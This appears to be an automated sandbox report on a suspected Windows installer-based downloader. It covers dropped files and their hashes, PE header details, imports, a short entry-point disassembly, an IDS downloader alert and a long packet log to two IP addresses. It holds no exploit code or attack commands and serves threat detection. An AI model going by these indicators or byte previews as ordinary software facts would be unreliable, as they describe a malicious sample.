Preview:	.ppp.....W.......................................!...................---...............p......].....................t................................I........}}..\.[.^^...............22..G...............TT..................x.aa...........<.\|............................................t.g..............................BB.................9999..?..............*****.....................qq....UUU..444......9999...........))))).........D.......................Q.EEEE...................NNNN.@.................W.............c.........,,....F........4...7....,.......z....f.........11.P.....................K.............c...................l..R.................}}....bb............uu..........%%%%%.f..........9..bbb.11........X.<<...I..)))..@.....OO..........................dd................;;.................x.%%.........&&................M...X.V...nn..(((..........FFF.........................................E...........hh.\....zz....I.0..{................e......._..........(.....................0

C:\Users\user\AppData\Roaming\erstatningsgraden\preappearance.glu

Download File

Process:	C:\Users\user\Desktop\7uY105UTJU.exe
File Type:	data
Category:	dropped
Size (bytes):	408232
Entropy (8bit):	1.259531155482668
Encrypted:	false
SSDEEP:	768:c3mYm00dVSgDT+afxNr3DwNJbiI7MrrtHFmYA3vCiuv/BQanrlhqkroqqL7jCzHs:X00FVwDotSeUpjvxXDpih4YZtc
MD5:	CCE82C77E237537520FBD52B63A51E58
SHA1:	D902CE813446431FFECA35141FCD9825D4DBEF4D
SHA-256:	0F7DCA6879E497104B6813228391DECF7D6270D90FC887F1B9384B5E5B438221
SHA-512:	2F0C0A6FBA09D19D72828589A658FEECD9E0A03F2B8C3DCA046AACFCB887375D538452D59DB24EDB8D17199AC3CA43ED1373262B6206B30F55F00ED159BAFEFE
Malicious:	false
Preview:	.......................................................................................P................0......................................................(.....................................................................................S.............................r..-.................n...................]....................................\|e................`......................{.................................J....................*......J............................]..................................................u..............................................................................................................\........................:...............................................................M..........................................................................................................................l..............l....8...........9............................................................2....=.........................................

C:\Users\user\AppData\Roaming\erstatningsgraden\reaktiv.ove

Download File

Process:	C:\Users\user\Desktop\7uY105UTJU.exe
File Type:	Matlab v4 mat-file (little endian) , numeric, rows 0, columns 55
Category:	dropped
Size (bytes):	379198
Entropy (8bit):	1.2531245811733491
Encrypted:	false
SSDEEP:	1536:K2a+g7Qqek5bnEKRY3dJkKoYZrcvYy5oXBfwokPtW:TrvqLJnudnttcvARYtW
MD5:	B4BD98AA231F431FA2C0B32C041971DA
SHA1:	D58868B02A5DEDACC33CE7EB0658201EF5A29766
SHA-256:	E34CA004CCB16A80E49010B584428A08AB3D89FCA778567346D26F84FF892962
SHA-512:	69CD7AF495A1DC3F612B456A2ABB2FE9F6FF556E73DA0707B26325E08AA94138FB094DAA4A35E7C7BCDCE81FDF118A9A4C664632523CEED16765B2E74FCBDD05
Malicious:	false
Preview:	........7....................................................$................................................n.........b...............S...............................................~%..........................................................................K................................................._....w.......*e.......b.'.....M.......].....................................................[.......................................................................u...G.............G.....................................F!.......................w...................................................................................r.....................................................F................>.s.....................................2......E..............g............................................................C.>...............A.........................................................................................................................S..........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.812999334605571
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	7uY105UTJU.exe
File size:	724'035 bytes
MD5:	81ee208a058efebddabd4f78fff047d0
SHA1:	b5855bdfbb89a50bec871ee72d675063f9b49183
SHA256:	259018c94d2704ea14bd29e2555a2ab62c278160c81ac824a372a7966565d5a2
SHA512:	7910d83fb7224e2030ba016500193272637a0f5d9647b333eaebd3de74a04466cd074f6214e0cd2098681da1c2c818a5be966e86145644af9dc6c4a37e6c43ff
SSDEEP:	12288:IfL/UfibuwTL89Y2deIT6q5ap7kd4tC04wL9tKlQyYefZKSxA340ryKhz:IfL8fibuw09zrpapgd48rwL9tjexKj3v
TLSH:	46F412C43D5044A2EEA6B872E9BB5D6107931D2B63D9371F6378326814932339B1FA1F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...l..d.................j.........

File Icon


Icon Hash:	539b8caeaee66c11

Static PE Info

General

Entrypoint:	0x403532
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x64A0DC6C [Sun Jul 2 02:09:48 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f4639a0b3116c2cfc71144b88a929cfd

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A4h]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007F4FB0D2AE3Ah
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007F4FB0D2AE08h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [004347B8h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8608	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x54000	0x16bf0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x68d8	0x6a00	742185983fa6320c910f81782213e56f	False	0.6695165094339622	data	6.478461709868021	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1464	0x1600	a995b118b38426885fc6ccaa984c8b7a	False	0.4314630681818182	data	4.969091535632612	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2a818	0x600	9a9bf385a30f1656fc362172b16d9268	False	0.5247395833333334	data	4.172601271908501	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x1f000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x54000	0x16bf0	0x16c00	4361f60a54e8593e396ed02385fb8e51	False	0.43695269574175827	data	5.337867037994319	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x54328	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.3725452502070271
RT_ICON	0x64b50	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5725103734439834
RT_ICON	0x670f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.676829268292683
RT_ICON	0x681a0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.6172707889125799
RT_ICON	0x69048	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.7436823104693141
RT_ICON	0x698f0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.5361271676300579
RT_ICON	0x69e58	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.849290780141844
RT_DIALOG	0x6a2c0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x6a3c0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x6a4e0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x6a5a8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x6a608	0x68	data	English	United States	0.7211538461538461
RT_VERSION	0x6a670	0x240	data	English	United States	0.5364583333333334
RT_MANIFEST	0x6a8b0	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T05:09:50.993196+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	54044	142.250.186.174	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 05:08:59.996721029 CET	53910	53	192.168.2.6	162.159.36.2
Jan 11, 2025 05:09:00.001652956 CET	53	53910	162.159.36.2	192.168.2.6
Jan 11, 2025 05:09:00.001825094 CET	53910	53	192.168.2.6	162.159.36.2
Jan 11, 2025 05:09:00.031299114 CET	53	53910	162.159.36.2	192.168.2.6
Jan 11, 2025 05:09:00.448615074 CET	53910	53	192.168.2.6	162.159.36.2
Jan 11, 2025 05:09:00.453799009 CET	53	53910	162.159.36.2	192.168.2.6
Jan 11, 2025 05:09:00.453870058 CET	53910	53	192.168.2.6	162.159.36.2
Jan 11, 2025 05:09:49.918132067 CET	54044	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:49.918247938 CET	443	54044	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:49.918320894 CET	54044	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:49.940471888 CET	54044	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:49.940555096 CET	443	54044	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:50.614176035 CET	443	54044	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:50.614278078 CET	54044	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:50.615272045 CET	443	54044	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:50.615341902 CET	54044	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:50.685269117 CET	54044	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:50.685324907 CET	443	54044	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:50.686341047 CET	443	54044	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:50.686409950 CET	54044	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:50.689955950 CET	54044	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:50.731348991 CET	443	54044	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:50.993261099 CET	443	54044	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:50.993386984 CET	54044	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:50.993403912 CET	443	54044	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:50.993452072 CET	54044	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:50.993627071 CET	54044	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:50.993705988 CET	443	54044	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:50.993767023 CET	54044	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:51.017533064 CET	54045	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:51.017591000 CET	443	54045	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:51.017680883 CET	54045	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:51.018125057 CET	54045	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:51.018147945 CET	443	54045	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:51.664824009 CET	443	54045	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:51.664916992 CET	54045	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:51.670272112 CET	54045	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:51.670309067 CET	443	54045	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:51.670706987 CET	443	54045	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:51.670769930 CET	54045	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:51.671227932 CET	54045	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:51.711342096 CET	443	54045	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:52.080967903 CET	443	54045	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:52.081057072 CET	443	54045	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:52.081078053 CET	54045	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:52.081123114 CET	443	54045	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:52.081142902 CET	443	54045	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:52.081142902 CET	54045	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:52.081170082 CET	54045	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:52.081207037 CET	54045	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:52.099666119 CET	54045	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:52.099713087 CET	443	54045	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:52.304001093 CET	54046	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:52.304065943 CET	443	54046	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:52.304141998 CET	54046	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:52.305315971 CET	54046	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:52.305341005 CET	443	54046	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:52.949595928 CET	443	54046	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:52.949769020 CET	54046	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:52.950472116 CET	443	54046	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:52.950545073 CET	54046	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:52.952373981 CET	54046	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:52.952402115 CET	443	54046	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:52.952658892 CET	443	54046	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:52.952713966 CET	54046	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:52.953171015 CET	54046	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:52.995337009 CET	443	54046	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:53.335983992 CET	443	54046	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:53.336467981 CET	443	54046	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:53.336702108 CET	54046	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:53.337697983 CET	54046	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:53.337718964 CET	443	54046	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:53.360860109 CET	54047	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:53.360927105 CET	443	54047	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:53.361002922 CET	54047	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:53.361274958 CET	54047	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:53.361296892 CET	443	54047	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:53.996566057 CET	443	54047	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:53.996944904 CET	54047	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:53.997462988 CET	54047	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:53.997482061 CET	443	54047	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:53.997648001 CET	54047	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:53.997656107 CET	443	54047	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:54.441742897 CET	443	54047	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:54.441829920 CET	443	54047	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:54.441912889 CET	443	54047	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:54.441931963 CET	54047	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:54.442028046 CET	54047	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:54.442852974 CET	54047	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:54.442881107 CET	443	54047	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:54.558219910 CET	54048	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:54.558268070 CET	443	54048	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:54.558428049 CET	54048	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:54.559017897 CET	54048	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:54.559030056 CET	443	54048	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:55.216763973 CET	443	54048	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:55.216880083 CET	54048	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:55.217421055 CET	54048	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:55.217427969 CET	443	54048	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:55.217609882 CET	54048	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:55.217614889 CET	443	54048	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:55.609997034 CET	443	54048	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:55.610080957 CET	54048	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:55.610244989 CET	54048	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:55.610279083 CET	443	54048	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:55.610325098 CET	54048	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:55.628060102 CET	54049	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:55.628128052 CET	443	54049	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:55.628215075 CET	54049	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:55.628458023 CET	54049	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:55.628473043 CET	443	54049	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:56.257549047 CET	443	54049	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:56.257735014 CET	54049	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:56.258497953 CET	54049	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:56.258513927 CET	443	54049	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:56.258692980 CET	54049	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:56.258697987 CET	443	54049	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:56.690269947 CET	443	54049	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:56.690310955 CET	443	54049	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:56.690349102 CET	54049	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:56.690365076 CET	443	54049	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:56.690377951 CET	54049	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:56.690404892 CET	54049	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:56.690623045 CET	443	54049	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:56.690666914 CET	54049	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:56.690679073 CET	443	54049	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:56.690720081 CET	54049	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:56.691140890 CET	54049	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:56.691155910 CET	443	54049	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:56.808322906 CET	54050	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:56.808351994 CET	443	54050	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:56.808427095 CET	54050	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:56.808732986 CET	54050	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:56.808743000 CET	443	54050	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:57.464972019 CET	443	54050	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:57.465080976 CET	54050	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:57.466054916 CET	443	54050	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:57.466120958 CET	54050	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:57.472054958 CET	54050	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:57.472068071 CET	443	54050	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:57.472455025 CET	443	54050	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:57.472508907 CET	54050	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:57.472906113 CET	54050	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:57.515322924 CET	443	54050	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:57.861449957 CET	443	54050	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:57.861540079 CET	54050	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:57.861561060 CET	443	54050	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:57.861603022 CET	54050	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:57.861670971 CET	443	54050	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:57.861712933 CET	54050	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:57.861756086 CET	54050	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:57.861772060 CET	443	54050	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:57.861783028 CET	54050	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:57.861805916 CET	54050	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:57.877769947 CET	54051	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:57.877810001 CET	443	54051	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:57.877888918 CET	54051	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:57.878110886 CET	54051	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:57.878123999 CET	443	54051	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:58.541079044 CET	443	54051	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:58.541179895 CET	54051	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:58.541696072 CET	54051	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:58.541702986 CET	443	54051	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:58.541882992 CET	54051	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:58.541887045 CET	443	54051	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:58.981178045 CET	443	54051	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:58.981236935 CET	443	54051	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:58.981296062 CET	443	54051	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:58.981309891 CET	54051	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:58.981329918 CET	54051	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:58.981340885 CET	54051	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:58.982014894 CET	54051	443	192.168.2.6	142.250.186.33
Jan 11, 2025 05:09:58.982031107 CET	443	54051	142.250.186.33	192.168.2.6
Jan 11, 2025 05:09:59.122561932 CET	54052	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:59.122592926 CET	443	54052	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:59.122705936 CET	54052	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:59.155117035 CET	54052	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:59.155147076 CET	443	54052	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:59.788698912 CET	443	54052	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:59.788768053 CET	54052	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:59.789361000 CET	54052	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:59.789366961 CET	443	54052	142.250.186.174	192.168.2.6
Jan 11, 2025 05:09:59.789549112 CET	54052	443	192.168.2.6	142.250.186.174
Jan 11, 2025 05:09:59.789552927 CET	443	54052	142.250.186.174	192.168.2.6
